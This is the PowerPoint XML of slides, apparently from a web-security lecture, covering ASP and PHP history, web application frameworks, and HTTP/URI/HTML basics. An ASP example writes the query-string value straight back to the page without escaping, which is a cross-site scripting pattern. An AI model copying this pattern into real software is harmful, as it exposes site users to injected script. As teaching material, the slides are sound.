            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241045" y="4427555"/>
            <a:ext cx="1808720" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4579955"/>
            <a:ext cx="1808720" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809629" y="2945061"/>
            <a:ext cx="564145" cy="821040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049765" y="3663049"/>
            <a:ext cx="2067743" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Web Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707333" y="3203530"/>
            <a:ext cx="1102296"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707333" y="3536137"/>
            <a:ext cx="1102297"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8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Server Pages (ASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft's answer to CGI scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First version released in 1996</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax of a program is a mix of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML Tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting directives (VBScript Jscript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side includes (#include, like C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting directives are interpreted and executed at runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will be supported "a minimum of 10 years from the Windows 8 release date"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>October 26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14916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 Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Request.Querystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("Name")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;&gt; "" Then %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;b&gt;Welcome!&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   Else %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;b&gt;You didn't provide a name...&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;% End If %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491619" y="1656644"/>
            <a:ext cx="7904491" cy="953911"/>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57201" y="2610556"/>
            <a:ext cx="3169356" cy="578556"/>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968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Application Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As the previous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Request.Querystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> example shows, frameworks were quickly created to assist web developers in making web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frameworks can help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ease extracting input to the web application (query parameters, form parameters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting/reading cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="917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Application Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important to study web application frameworks to understand the (security) pros and cons of each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some vulnerability classes are only present in certain frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99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Three Central Technologies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How to name a resource?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Uniform Resource Identifier (URI/URL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How to request and serve a resource?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Hypertext Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How to create hypertext?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Hypertext Markup Language (HTML)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35341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Hypertext Preprocessor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting language that can be embedded in HTML pages to generate dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic idea is similar to JSP and ASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Originally released in 1995 as a series of CGI scripts as C binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP 3.0 released June 1998 is the closest to current PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"At its peak, PHP 3.0 was installed on approximately 10% of the web servers on the Internet" - http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/manual/en/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>history.php.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP 4.0 released May 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP 5.0 released July 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Added support for objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP 5.6 released August 2014 is the latest version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3589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Popularity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="279400" y="1333500"/>
            <a:ext cx="8572500" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6003053"/>
            <a:ext cx="8229600" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>news.netcraft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/archives/2013/01/31/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>-just-grows-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>grows.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The page is parsed and interpreted on each page request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP interpreter can be embedded into the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mod_php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completely new language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C-like in syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom designed to build web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Language grew organically over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5263444" y="69144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89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Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        &lt;title&gt;PHP Test&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> echo '&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/p&gt;'; ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
